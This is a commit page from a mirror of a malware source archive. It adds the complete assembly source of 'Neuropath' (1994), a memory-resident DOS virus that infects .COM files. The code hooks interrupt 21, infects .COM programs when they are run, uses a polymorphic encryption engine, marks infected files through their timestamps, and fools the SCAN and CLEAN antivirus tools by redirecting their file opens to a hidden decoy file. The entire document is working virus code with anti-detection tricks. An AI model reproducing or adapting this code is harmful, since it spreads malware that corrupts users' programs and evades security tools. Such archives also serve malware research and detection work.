mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
re-organize
push
This commit is contained in:
vxunderground
@@ -0,0 +1,286 @@
|
||||
; ========================================================================>
|
||||
; [Neuropath] by MnemoniX 1994
|
||||
;
|
||||
; * Memory resident .COM infector
|
||||
; * Polymorphic (engine in neuroeng.asm - lame but effective)
|
||||
; * Anti-SCAN and CLEAN stealth technique - creates hidden file in
|
||||
; root directory; when SCAN or CLEAN is run all attempts to open .COM
|
||||
; files are redirected to hidden file, and they all come out clean.
|
||||
; ========================================================================>
|
||||
|
||||
code segment
|
||||
org 0
|
||||
assume cs:code
|
||||
|
||||
start:
|
||||
db 0E9h,0,0
|
||||
|
||||
virus_begin:
|
||||
call $ + 3
|
||||
pop bp
|
||||
sub bp,offset $ - 1
|
||||
|
||||
mov ah,3Ch
|
||||
mov cx,2
|
||||
lea dx,[bp + dummy_file] ; create dummy file
|
||||
int 21h
|
||||
|
||||
mov ah,3Eh
|
||||
int 21h
|
||||
|
||||
install:
|
||||
mov ax,5786h
|
||||
int 21h
|
||||
|
||||
push ds es
|
||||
|
||||
mov ax,ds
|
||||
dec ax
|
||||
mov ds,ax
|
||||
|
||||
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
|
||||
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
|
||||
mov es,word ptr ds:[12h]
|
||||
|
||||
push cs ; copy virus into memory
|
||||
pop ds
|
||||
xor di,di
|
||||
mov si,bp
|
||||
mov cx,(virus_end - start) / 2 + 1
|
||||
rep movsw
|
||||
|
||||
xor ax,ax ; capture interrupt 21
|
||||
mov ds,ax
|
||||
|
||||
mov si,21h * 4
|
||||
mov di,offset old_int_21
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr [si - 4],offset new_int_21
|
||||
mov [si - 2],es
|
||||
|
||||
pop es ds
|
||||
jmp install
|
||||
|
||||
int_21:
|
||||
pushf
|
||||
call dword ptr cs:[old_int_21]
|
||||
ret
|
||||
|
||||
new_int_21:
|
||||
cmp ax,5786h
|
||||
je restore_host
|
||||
|
||||
cmp ah,4Ch
|
||||
je terminate
|
||||
|
||||
cmp ah,3Dh
|
||||
je file_open
|
||||
|
||||
not ax
|
||||
cmp ax,0B4FFh
|
||||
je execute
|
||||
int_21_4B_exit:
|
||||
not ax
|
||||
|
||||
int_21_exit:
|
||||
db 0EAh
|
||||
old_int_21 dd 0
|
||||
|
||||
restore_host:
|
||||
pop ax
|
||||
pop ax
|
||||
|
||||
push ds
|
||||
mov di,0FEFFh
|
||||
not di
|
||||
|
||||
lea si,[bp + host]
|
||||
push di
|
||||
movsw
|
||||
movsb
|
||||
|
||||
iret
|
||||
|
||||
terminate:
|
||||
mov cs:McAffee_alert,0
|
||||
jmp int_21_exit
|
||||
|
||||
file_open:
|
||||
cmp cs:McAffee_alert,1
|
||||
jne int_21_exit
|
||||
|
||||
push ax si
|
||||
mov si,dx
|
||||
|
||||
find_ext:
|
||||
lodsb
|
||||
cmp al,'.'
|
||||
je ext_found
|
||||
test al,al
|
||||
je not_com
|
||||
jmp find_ext
|
||||
|
||||
ext_found:
|
||||
cmp ds:[si],'OC' ; .COM?
|
||||
jne not_com
|
||||
cmp byte ptr ds:[si + 2],'M'
|
||||
jne not_com
|
||||
|
||||
pop si ax
|
||||
push ds dx
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset dummy_file
|
||||
call int_21
|
||||
|
||||
pop dx ds
|
||||
retf 2
|
||||
not_com:
|
||||
pop si ax
|
||||
jmp int_21_exit
|
||||
|
||||
execute:
|
||||
push ax si
|
||||
mov si,dx
|
||||
|
||||
find_ext_2:
|
||||
lodsb
|
||||
cmp al,'.'
|
||||
je ext_found_2
|
||||
test al,al
|
||||
je no_scan
|
||||
jmp find_ext_2
|
||||
ext_found_2:
|
||||
cmp ds:[si],'XE' ; check for SCAN.EXE
|
||||
jne no_scan
|
||||
cmp ds:[si - 3],'NA'
|
||||
jne no_scan
|
||||
cmp ds:[si - 5],'CS'
|
||||
jne perhaps_clean
|
||||
mcaffee_on:
|
||||
pop si ax
|
||||
mov cs:McAffee_alert,1 ; McAffee alert!
|
||||
jmp int_21_4B_exit
|
||||
|
||||
perhaps_clean:
|
||||
cmp ds:[si - 5],'EL' ; check for CLEAN.EXE
|
||||
jne no_scan
|
||||
cmp byte ptr ds:[si - 6],'C'
|
||||
je mcaffee_on
|
||||
no_scan:
|
||||
pop si ax
|
||||
push ax bx cx dx si di bp ds es
|
||||
|
||||
mov ax,3D00h
|
||||
call int_21
|
||||
jnc check_out
|
||||
jmp cant_open
|
||||
check_out:
|
||||
xchg ax,bx
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
push bx
|
||||
mov ax,ds:sft_1
|
||||
int 2Fh
|
||||
|
||||
mov ax,ds:sft_2
|
||||
mov bl,es:[di]
|
||||
int 2Fh
|
||||
pop bx
|
||||
|
||||
mov word ptr es:[di + 2],2
|
||||
|
||||
mov ax,es:[di + 0Dh]
|
||||
and al,31
|
||||
cmp al,24 ; marker is 24
|
||||
je dont_infect
|
||||
|
||||
mov ah,ds:file_read ; anti-TBSCAN
|
||||
mov dx,offset host
|
||||
mov cx,3
|
||||
call int_21
|
||||
|
||||
mov ax,word ptr ds:host
|
||||
sub ax,'ZM'
|
||||
je dont_infect
|
||||
|
||||
mov ax,es:[di + 11h] ; file size
|
||||
cmp ax,65278 - VIRUS_SIZE
|
||||
jae dont_infect
|
||||
|
||||
mov es:[di + 15h],ax
|
||||
sub ax,3
|
||||
mov word ptr ds:new_jump + 1,ax
|
||||
|
||||
push es di bx
|
||||
add ax,103h
|
||||
xchg dx,ax
|
||||
mov cx,VIRUS_SIZE
|
||||
mov si,offset virus_begin
|
||||
mov di,offset encrypt_buffer
|
||||
|
||||
push cs
|
||||
pop es
|
||||
|
||||
call engine
|
||||
pop bx di es
|
||||
|
||||
mov dx,offset encrypt_buffer
|
||||
call write_it
|
||||
|
||||
mov word ptr es:[di + 15h],0
|
||||
mov cx,3
|
||||
mov dx,offset new_jump
|
||||
call write_it
|
||||
|
||||
dont_infect:
|
||||
mov ax,ds:set_date ; anti-TBSCAN
|
||||
mov cx,es:[di + 0Dh]
|
||||
mov dx,es:[di + 0Fh]
|
||||
and cl,-32
|
||||
or cl,24
|
||||
call int_21
|
||||
|
||||
mov ah,3Eh
|
||||
call int_21
|
||||
cant_open:
|
||||
pop es ds bp di si dx cx bx ax
|
||||
jmp int_21_4B_exit
|
||||
|
||||
write_it:
|
||||
mov ah,ds:file_write ; anti-TBSCAN
|
||||
call int_21
|
||||
ret
|
||||
|
||||
db '[Neuropath] MnemoniX',0
|
||||
|
||||
dummy_file db '\',-1,-1,0 ; 2 ASCII 255s
|
||||
|
||||
include neuroeng.asm
|
||||
|
||||
McAffee_alert db 0
|
||||
host db 0CDh,20h,0
|
||||
new_jump db 0E9h,0,0
|
||||
|
||||
set_date dw 5701h
|
||||
file_read db 3Fh
|
||||
file_write db 40h
|
||||
sft_1 dw 1220h
|
||||
sft_2 dw 1216h
|
||||
|
||||
virus_end:
|
||||
VIRUS_SIZE equ virus_end - virus_begin
|
||||
|
||||
encrypt_buffer db VIRUS_SIZE + 1000 dup (?)
|
||||
|
||||
heap_end:
|
||||
|
||||
MEM_SIZE equ heap_end - start
|
||||
|
||||
code ends
|
||||
end start
|
||||
Reference in New Issue
Block a user